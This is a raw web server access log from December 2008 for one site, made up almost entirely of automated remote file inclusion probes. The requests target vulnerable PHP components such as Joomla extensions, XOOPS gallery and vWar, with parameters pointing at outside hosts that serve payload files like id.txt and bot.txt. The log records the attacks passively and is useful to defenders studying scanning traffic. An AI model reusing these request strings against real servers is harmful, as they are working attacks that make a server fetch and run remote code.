78.40.226.135 - - [08/Dec/2008:09:57:50 -0800] "GET /logs/access_081008.log//classes/Auth/OpenID/Association.php?_ENV[asicms][path]=http://emodrago.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.11.126.16 - - [08/Dec/2008:09:57:55 -0800] "GET /logs/access_080519.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.lycos.es/mnbmnb/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.11.126.16 - - [08/Dec/2008:09:57:55 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.lycos.es/mnbmnb/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.11.126.16 - - [08/Dec/2008:09:57:55 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.lycos.es/mnbmnb/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.247.65.114 - - [08/Dec/2008:09:57:57 -0800] "GET /logs/access_080228.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.geocities.com/kebrok_joss/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
93.80.139.121 - - [08/Dec/2008:09:58:39 -0800] "GET /logs/access_080505.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.geocities.com/doni_they/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
93.80.139.121 - - [08/Dec/2008:09:58:39 -0800] "GET /logs/access_080416.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.geocities.com/doni_they/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:58:56 -0800] "GET /logs/access_080714.log/contenido.php?sec=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
208.77.100.195 - - [08/Dec/2008:09:59:27 -0800] "GET /logs/access_080919.log///vwar/backup/errors.php?error=http://millionaire-secrets.bikaigroup.us/images/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
208.77.100.195 - - [08/Dec/2008:09:59:27 -0800] "GET //vwar/backup/errors.php?error=http://millionaire-secrets.bikaigroup.us/images/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
208.77.100.195 - - [08/Dec/2008:09:59:27 -0800] "GET /logs///vwar/backup/errors.php?error=http://millionaire-secrets.bikaigroup.us/images/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
203.146.102.38 - - [08/Dec/2008:09:59:28 -0800] "GET /logs/access_080216.log//errors.php?error=http://killearnlakeshoa.org/calendar/includes/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.146.102.38 - - [08/Dec/2008:09:59:29 -0800] "GET /errors.php?error=http://killearnlakeshoa.org/calendar/includes/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.146.102.38 - - [08/Dec/2008:09:59:29 -0800] "GET /logs//errors.php?error=http://killearnlakeshoa.org/calendar/includes/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.146.102.38 - - [08/Dec/2008:10:00:10 -0800] "GET /logs/access_080216.log//errors.php?error=http://killearnlakeshoa.org/calendar/includes/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.146.102.38 - - [08/Dec/2008:10:00:14 -0800] "GET /errors.php?error=http://killearnlakeshoa.org/calendar/includes/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.146.102.38 - - [08/Dec/2008:10:00:14 -0800] "GET /logs//errors.php?error=http://killearnlakeshoa.org/calendar/includes/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:10:00:22 -0800] "GET /logs/access_080715.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://sozdaem.com.ua/c8a2a99e526bbf770319b415c1708fb7/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:10:00:31 -0800] "GET /logs/access_080307.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:10:00:31 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:10:00:32 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
189.11.126.16 - - [08/Dec/2008:10:00:35 -0800] "GET /logs/access_080519.log/modules/My_eGallery/index.php?basepath=http://usuarios.lycos.es/mnbmnb/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.11.126.16 - - [08/Dec/2008:10:00:35 -0800] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.lycos.es/mnbmnb/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.11.126.16 - - [08/Dec/2008:10:00:35 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.lycos.es/mnbmnb/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.14 - - [08/Dec/2008:10:00:44 -0800] "GET /appserv/errors.php?error=http://www.longlakecamp.ca/guestbook//fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.14 - - [08/Dec/2008:10:00:44 -0800] "GET /logs//appserv/errors.php?error=http://www.longlakecamp.ca/guestbook//fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.14 - - [08/Dec/2008:10:00:44 -0800] "GET /logs/access_080401.log%20%20//appserv/errors.php?error=http://www.longlakecamp.ca/guestbook//fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:10:00:49 -0800] "GET /logs/access_080406.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
77.221.130.14 - - [08/Dec/2008:10:01:00 -0800] "GET /logs/access_080511.log%20%20//appserv/errors.php?error=http://www.longlakecamp.ca/guestbook//fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
189.11.126.16 - - [08/Dec/2008:10:01:14 -0800] "GET /logs/access_080509.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.lycos.es/mnbmnb/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.110.147.194 - - [08/Dec/2008:10:01:19 -0800] "GET /logs/access_081114.log/errors.php?error=http://sior.org/zero/build/net.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.110.147.194 - - [08/Dec/2008:10:01:19 -0800] "GET /errors.php?error=http://sior.org/zero/build/net.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.110.147.194 - - [08/Dec/2008:10:01:20 -0800] "GET /logs/errors.php?error=http://sior.org/zero/build/net.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.110.147.194 - - [08/Dec/2008:10:01:23 -0800] "GET /logs/access_081114.log/errors.php?error=http://sior.org/zero/build/net.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.110.147.194 - - [08/Dec/2008:10:01:23 -0800] "GET /errors.php?error=http://sior.org/zero/build/net.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.110.147.194 - - [08/Dec/2008:10:01:24 -0800] "GET /logs/errors.php?error=http://sior.org/zero/build/net.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
208.77.100.195 - - [08/Dec/2008:10:01:34 -0800] "GET /logs/access_080816.log///vwar/backup/errors.php?error=http://millionaire-secrets.bikaigroup.us/images/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
77.221.130.14 - - [08/Dec/2008:10:01:45 -0800] "GET /logs/index.php?language=http://www.longlakecamp.ca/guestbook//fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.14 - - [08/Dec/2008:10:01:45 -0800] "GET /logs/access_080503.log/index.php?language=http://www.longlakecamp.ca/guestbook//fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.14 - - [08/Dec/2008:10:01:46 -0800] "GET /index.php?language=http://www.longlakecamp.ca/guestbook//fx29id.txt?? HTTP/1.1" 200 94788 "-" "Mozilla/5.0" "www.dmulk.com"
72.232.202.218 - - [08/Dec/2008:10:02:02 -0800] "GET /logs/access_080322.log/protection.php?action=logout&siteurl=http://djvirgil.nl/modules/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.232.202.218 - - [08/Dec/2008:10:02:02 -0800] "GET /protection.php?action=logout&siteurl=http://djvirgil.nl/modules/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.232.202.218 - - [08/Dec/2008:10:02:02 -0800] "GET /logs/protection.php?action=logout&siteurl=http://djvirgil.nl/modules/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
189.11.126.16 - - [08/Dec/2008:10:02:03 -0800] "GET /logs/access_080514.log%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.lycos.es/mnbmnb/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:10:02:05 -0800] "GET /local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:10:02:05 -0800] "GET /logs/access_081014.log//local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:10:02:05 -0800] "GET /logs//local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:10:02:05 -0800] "GET /logs/access_081031.log//local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:10:02:11 -0800] "GET /local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:10:02:11 -0800] "GET /logs//local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:10:02:11 -0800] "GET /logs/access_081014.log//local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:10:02:11 -0800] "GET /logs/access_081031.log//local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.229.72.8 - - [08/Dec/2008:10:02:55 -0800] "GET /logs/access_080828.log/errors.php?error=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
81.229.72.8 - - [08/Dec/2008:10:02:58 -0800] "GET /errors.php?error=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
81.229.72.8 - - [08/Dec/2008:10:02:58 -0800] "GET /logs/errors.php?error=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
195.14.22.20 - - [08/Dec/2008:10:03:05 -0800] "GET /logs/access_081125.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gupyong.es.kr/zboard//skin/buzzard1/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.14.22.20 - - [08/Dec/2008:10:03:05 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gupyong.es.kr/zboard//skin/buzzard1/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.14.22.20 - - [08/Dec/2008:10:03:06 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gupyong.es.kr/zboard//skin/buzzard1/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
86.109.109.21 - - [08/Dec/2008:10:03:10 -0800] "GET /logs/access_081114.log//admin/index.php?o=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.102.38 - - [08/Dec/2008:10:03:12 -0800] "GET /logs/access_080311.log//errors.php?error=http://killearnlakeshoa.org/calendar/includes/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:10:03:12 -0800] "GET /logs/access_081031.log//local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:10:03:12 -0800] "GET /logs/access_081014.log//local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:10:03:12 -0800] "GET /local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:10:03:12 -0800] "GET /logs//local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:10:03:12 -0800] "GET /popup_window.php?site_isp_root=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:10:03:12 -0800] "GET /logs//popup_window.php?site_isp_root=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:10:03:13 -0800] "GET /logs/access_080808.log//popup_window.php?site_isp_root=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
203.146.102.38 - - [08/Dec/2008:10:03:20 -0800] "GET /logs/access_080311.log//errors.php?error=http://killearnlakeshoa.org/calendar/includes/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.78.216.197 - - [08/Dec/2008:10:03:22 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ingenieria.unilibrecali.edu.co/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
82.78.216.197 - - [08/Dec/2008:10:03:22 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ingenieria.unilibrecali.edu.co/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:10:03:31 -0800] "GET /logs/access_080322.log/protection.php?action=logout&siteurl=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:10:03:31 -0800] "GET /protection.php?action=logout&siteurl=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:10:03:32 -0800] "GET /logs/protection.php?action=logout&siteurl=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:10:03:38 -0800] "GET /logs/access_081014.log//local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:10:03:38 -0800] "GET /logs//local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:10:03:38 -0800] "GET /local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:10:03:38 -0800] "GET /logs/access_081031.log//local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.229.72.8 - - [08/Dec/2008:10:03:42 -0800] "GET /logs/access_081002.log/errors.php?error=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:10:03:43 -0800] "GET /logs/access_080322.log/protection.php?action=logout&siteurl=http://sozdaem.com.ua/c8a2a99e526bbf770319b415c1708fb7/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:10:03:43 -0800] "GET /protection.php?action=logout&siteurl=http://sozdaem.com.ua/c8a2a99e526bbf770319b415c1708fb7/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:10:03:43 -0800] "GET /logs/protection.php?action=logout&siteurl=http://sozdaem.com.ua/c8a2a99e526bbf770319b415c1708fb7/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.202.218 - - [08/Dec/2008:10:03:46 -0800] "GET /logs/access_080715.log/protection.php?action=logout&siteurl=http://djvirgil.nl/modules/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
189.11.126.16 - - [08/Dec/2008:10:03:54 -0800] "GET /squirrelcart/cart_content.php?cart_isp_root=http://usuarios.lycos.es/mnbmnb/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.11.126.16 - - [08/Dec/2008:10:03:54 -0800] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://usuarios.lycos.es/mnbmnb/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.11.126.16 - - [08/Dec/2008:10:03:54 -0800] "GET /logs/access_081114.log%20//squirrelcart/cart_content.php?cart_isp_root=http://usuarios.lycos.es/mnbmnb/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.98.224.194 - - [08/Dec/2008:10:04:21 -0800] "GET /logs/access_081118.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://90plan.ovh.net/~riemai/mambots/search/scr.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:10:04:49 -0800] "GET /logs/access_080415.log//popup_window.php?site_isp_root=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
72.232.202.218 - - [08/Dec/2008:10:04:51 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://djvirgil.nl/modules/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.232.202.218 - - [08/Dec/2008:10:04:51 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://djvirgil.nl/modules/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.232.202.218 - - [08/Dec/2008:10:04:54 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://djvirgil.nl/modules/ids.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.232.202.218 - - [08/Dec/2008:10:04:54 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://djvirgil.nl/modules/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.232.202.218 - - [08/Dec/2008:10:05:25 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://djvirgil.nl/modules/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.232.202.218 - - [08/Dec/2008:10:05:25 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://djvirgil.nl/modules/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.232.202.218 - - [08/Dec/2008:10:05:30 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://djvirgil.nl/modules/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.232.202.218 - - [08/Dec/2008:10:05:30 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://djvirgil.nl/modules/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
63.247.65.114 - - [08/Dec/2008:10:05:31 -0800] "GET /oneadmin/calendar/include.php?path[docroot]=http://www.geocities.com/kebrok_joss/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:10:05:36 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://sozdaem.com.ua/c8a2a99e526bbf770319b415c1708fb7/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:10:05:36 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://sozdaem.com.ua/c8a2a99e526bbf770319b415c1708fb7/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:10:05:45 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://sozdaem.com.ua/c8a2a99e526bbf770319b415c1708fb7/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:10:05:45 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://sozdaem.com.ua/c8a2a99e526bbf770319b415c1708fb7/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:10:05:50 -0800] "GET /logs/access_080715.log/protection.php?action=logout&siteurl=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.77.100.195 - - [08/Dec/2008:10:05:59 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://millionaire-secrets.bikaigroup.us/images/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
208.77.100.195 - - [08/Dec/2008:10:05:59 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://millionaire-secrets.bikaigroup.us/images/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
208.77.100.195 - - [08/Dec/2008:10:05:59 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://millionaire-secrets.bikaigroup.us/images/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:10:06:03 -0800] "GET /logs/access_080715.log/protection.php?action=logout&siteurl=http://sozdaem.com.ua/c8a2a99e526bbf770319b415c1708fb7/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.246.45 - - [08/Dec/2008:10:06:15 -0800] "GET /logs/access_081125.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gupyong.es.kr/zboard//skin/buzzard1/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.246.45 - - [08/Dec/2008:10:06:16 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gupyong.es.kr/zboard//skin/buzzard1/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.246.45 - - [08/Dec/2008:10:06:16 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gupyong.es.kr/zboard//skin/buzzard1/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.11.126.16 - - [08/Dec/2008:10:06:52 -0800] "GET /logs/access_080228.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.lycos.es/mnbmnb/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.77.100.195 - - [08/Dec/2008:10:07:24 -0800] "GET /logs/access_081107.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://millionaire-secrets.bikaigroup.us/images/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
189.11.126.16 - - [08/Dec/2008:10:07:25 -0800] "GET /logs/access_080808.log//squirrelcart/cart_content.php?cart_isp_root=http://usuarios.lycos.es/mnbmnb/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.11.126.16 - - [08/Dec/2008:10:07:40 -0800] "GET /logs/access_080524.log/modules/My_eGallery/index.php?basepath=http://usuarios.lycos.es/mnbmnb/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.201.52.117 - - [08/Dec/2008:10:08:15 -0800] "GET /logs/access_081125.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gupyong.es.kr/zboard//skin/buzzard1/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.201.52.117 - - [08/Dec/2008:10:08:15 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gupyong.es.kr/zboard//skin/buzzard1/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
